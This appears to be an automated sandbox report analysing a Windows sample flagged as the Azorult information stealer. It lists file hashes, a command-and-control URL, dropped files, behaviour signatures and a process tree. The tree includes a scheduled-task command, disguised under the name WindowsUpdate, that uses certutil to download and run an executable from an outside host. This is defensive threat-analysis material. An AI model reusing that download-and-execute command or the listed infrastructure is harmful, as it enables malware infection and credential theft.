Analysis
-
max time kernel
152s -
max time network
192s -
platform
windows10-2004_x64 -
resource
win10v2004-20221111-en -
resource tags
arch:x64arch:x86image:win10v2004-20221111-enlocale:en-usos:windows10-2004-x64system -
submitted
30-11-2022 09:18
Static task
static1
Behavioral task
behavioral1
Sample
8ba6987bd8e765df43142f5b7803c88eccc85faf.exe
Resource
win7-20220812-en
Behavioral task
behavioral2
Sample
8ba6987bd8e765df43142f5b7803c88eccc85faf.exe
Resource
win10v2004-20221111-en
General
-
Target
8ba6987bd8e765df43142f5b7803c88eccc85faf.exe
-
Size
424KB
-
MD5
a9b6246022869177cb7d66177b2bb480
-
SHA1
8ba6987bd8e765df43142f5b7803c88eccc85faf
-
SHA256
18f0eeec4de09ac329406c8a6cc99763015cf654ebc5404bb6150f6cf879bcb8
-
SHA512
21ccb922e58aec1c1aac280e8335c925b4d0982286c97844590682729e6f33896076cf1dddac366ae466b78c2d02ad588241bc0b658072b6edcf78a363c419d5
-
SSDEEP
6144:37ecOvI7EzEGRtx516Zkc3a6ZXGokcG1W9TwfpkkUnbPJUDlm4aaEt2GoyN6pB+H:r5CEI6Z9a6Is19Twfp6nDwlmXlw5wc4
Malware Config
Extracted
azorult
http://balaborka.com/index.php
Signatures
-
Azorult
An information stealer that was first discovered in 2016, targeting browsing history and passwords.
-
Executes dropped EXE 4 IoCs
Processes:
TELE.dllRTR.exeNBBB.dllmoom.exepid process 1812 TELE.dll 4504 RTR.exe 3732 NBBB.dll 4312 moom.exe -
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
TELE.dllNBBB.dlldescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000\Control Panel\International\Geo\Nation TELE.dll Key value queried \REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000\Control Panel\International\Geo\Nation NBBB.dll -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
NSIS installer 4 IoCs
Processes:
resource yara_rule C:\Users\Admin\AppData\Local\Temp\moom.exe nsis_installer_1 C:\Users\Admin\AppData\Local\Temp\moom.exe nsis_installer_2 C:\Users\Admin\AppData\Local\Temp\Moom.exe nsis_installer_1 C:\Users\Admin\AppData\Local\Temp\Moom.exe nsis_installer_2 -
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Suspicious use of WriteProcessMemory 15 IoCs
Processes:
8ba6987bd8e765df43142f5b7803c88eccc85faf.exeTELE.dllNBBB.dlldescription pid process target process PID 4220 wrote to memory of 1812 4220 8ba6987bd8e765df43142f5b7803c88eccc85faf.exe TELE.dll PID 4220 wrote to memory of 1812 4220 8ba6987bd8e765df43142f5b7803c88eccc85faf.exe TELE.dll PID 4220 wrote to memory of 1812 4220 8ba6987bd8e765df43142f5b7803c88eccc85faf.exe TELE.dll PID 1812 wrote to memory of 4504 1812 TELE.dll RTR.exe PID 1812 wrote to memory of 4504 1812 TELE.dll RTR.exe PID 1812 wrote to memory of 4504 1812 TELE.dll RTR.exe PID 4220 wrote to memory of 3732 4220 8ba6987bd8e765df43142f5b7803c88eccc85faf.exe NBBB.dll PID 4220 wrote to memory of 3732 4220 8ba6987bd8e765df43142f5b7803c88eccc85faf.exe NBBB.dll PID 4220 wrote to memory of 3732 4220 8ba6987bd8e765df43142f5b7803c88eccc85faf.exe NBBB.dll PID 3732 wrote to memory of 4312 3732 NBBB.dll moom.exe PID 3732 wrote to memory of 4312 3732 NBBB.dll moom.exe PID 3732 wrote to memory of 4312 3732 NBBB.dll moom.exe PID 4220 wrote to memory of 4324 4220 8ba6987bd8e765df43142f5b7803c88eccc85faf.exe schtasks.exe PID 4220 wrote to memory of 4324 4220 8ba6987bd8e765df43142f5b7803c88eccc85faf.exe schtasks.exe PID 4220 wrote to memory of 4324 4220 8ba6987bd8e765df43142f5b7803c88eccc85faf.exe schtasks.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\8ba6987bd8e765df43142f5b7803c88eccc85faf.exe"C:\Users\Admin\AppData\Local\Temp\8ba6987bd8e765df43142f5b7803c88eccc85faf.exe"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\TELE.dll"C:\Users\Admin\AppData\Local\Temp\TELE.dll" -s -pfsdgsdfvsdzcxfsDC2⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Roaming\RTR.exe"C:\Users\Admin\AppData\Roaming\RTR.exe"3⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\NBBB.dll"C:\Users\Admin\AppData\Local\Temp\NBBB.dll" -s -pfsdgsdfvsdzcxfsDC2⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\moom.exe"C:\Users\Admin\AppData\Local\Temp\moom.exe"3⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\schtasks.exe"schtasks.exe" /CREATE /SC MINUTE /MO 59 /TR "cmd.exe /C certutil.exe -urlcache -split -f http://asdfghjkl0.com/task_schedule.exe %TEMP%\task_schedule.exe && %TEMP%\task_schedule.exe" /TN WindowsUpdate /F2⤵
- Creates scheduled task(s)
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Temp\Moom.exeFilesize
35KB
MD5c9390e3854911caf1e62713201edc91a
SHA1e2fd4e0e57aadd4e5af3eec8ed33fd404ececbdc
SHA25646b35ef08a27559aefa62de19391df8eee8535a94c17c82ff96b38d02f7520ba
SHA512ecd7033da0f2fa756db3a48d9bb89e6b365a9b87b6434d590de8732c4d60bbb9ca8969a67c98e7e9c96be8b6d16ebe6723a3531c848fdd3fc534fe2e308472e8
-
C:\Users\Admin\AppData\Local\Temp\NBBB.dllFilesize
270KB
MD576c0d2b7eb5e12cf8be7afa8848a284b
SHA1d618f76f93d1d86e68789e4f1bbccbb2f2271e97
SHA2562e7aadf3967648baf07836eb464cafa4d74ef6ed6970b551c0bf719b01efc621
SHA512bfca9b36d104a5135fe3a2dcb4e531e26e0b30c64fdef7740b96d142b9dc029916fe7041c2d31a90f03007d9b946828085847fc18d25cd8b2adc34f5f5564b54
-
C:\Users\Admin\AppData\Local\Temp\NBBB.dllFilesize
270KB
MD576c0d2b7eb5e12cf8be7afa8848a284b
SHA1d618f76f93d1d86e68789e4f1bbccbb2f2271e97
SHA2562e7aadf3967648baf07836eb464cafa4d74ef6ed6970b551c0bf719b01efc621
SHA512bfca9b36d104a5135fe3a2dcb4e531e26e0b30c64fdef7740b96d142b9dc029916fe7041c2d31a90f03007d9b946828085847fc18d25cd8b2adc34f5f5564b54
-
C:\Users\Admin\AppData\Local\Temp\TELE.dllFilesize
318KB
MD54c1669be5280d41749bdd3f7ebf3900a
SHA16e2a5cb4f60225225eaf058fd6bfacc2a6fddc5e
SHA256853d71aaa7d63fa30595ace49b8ace3c2439fd1c10ba59628f8a45c4226bc2f7
SHA5124c0fcac3ffc6a95038042904da84ada5ab7ba0cb771e56a821aaa0735c14c6e99d5979b3a65c37fc95567c314aa1c039c84779379e569e90bf104720502d5d95
-
C:\Users\Admin\AppData\Local\Temp\TELE.dllFilesize
318KB
MD54c1669be5280d41749bdd3f7ebf3900a
SHA16e2a5cb4f60225225eaf058fd6bfacc2a6fddc5e
SHA256853d71aaa7d63fa30595ace49b8ace3c2439fd1c10ba59628f8a45c4226bc2f7
SHA5124c0fcac3ffc6a95038042904da84ada5ab7ba0cb771e56a821aaa0735c14c6e99d5979b3a65c37fc95567c314aa1c039c84779379e569e90bf104720502d5d95
-
C:\Users\Admin\AppData\Local\Temp\moom.exeFilesize
35KB
MD5c9390e3854911caf1e62713201edc91a
SHA1e2fd4e0e57aadd4e5af3eec8ed33fd404ececbdc
SHA25646b35ef08a27559aefa62de19391df8eee8535a94c17c82ff96b38d02f7520ba
SHA512ecd7033da0f2fa756db3a48d9bb89e6b365a9b87b6434d590de8732c4d60bbb9ca8969a67c98e7e9c96be8b6d16ebe6723a3531c848fdd3fc534fe2e308472e8
-
C:\Users\Admin\AppData\Roaming\RTR.exeFilesize
118KB
MD5aa851fc2d1246b0015345bd553df643c
SHA1ad944725f80b16c115754128dd2f8d7ccc931bd9
SHA256fa565648efcd87cf810f2d19c41b9e9ddd6e6f9e326a12c0cc657ae1da19c2c9
SHA51248fccb77dc7fcea6ef564023c187bd44ad748ce1b1d0d812c80e918dc48c31d87174afb582e0c3f1f4ca84936e3ab482c101538695e58472b8ff69eb4d23c38e
-
C:\Users\Admin\AppData\Roaming\RTR.exeFilesize
118KB
MD5aa851fc2d1246b0015345bd553df643c
SHA1ad944725f80b16c115754128dd2f8d7ccc931bd9
SHA256fa565648efcd87cf810f2d19c41b9e9ddd6e6f9e326a12c0cc657ae1da19c2c9
SHA51248fccb77dc7fcea6ef564023c187bd44ad748ce1b1d0d812c80e918dc48c31d87174afb582e0c3f1f4ca84936e3ab482c101538695e58472b8ff69eb4d23c38e
-
memory/1812-132-0x0000000000000000-mapping.dmp
-
memory/3732-138-0x0000000000000000-mapping.dmp
-
memory/4312-141-0x0000000000000000-mapping.dmp
-
memory/4324-144-0x0000000000000000-mapping.dmp
-
memory/4504-135-0x0000000000000000-mapping.dmp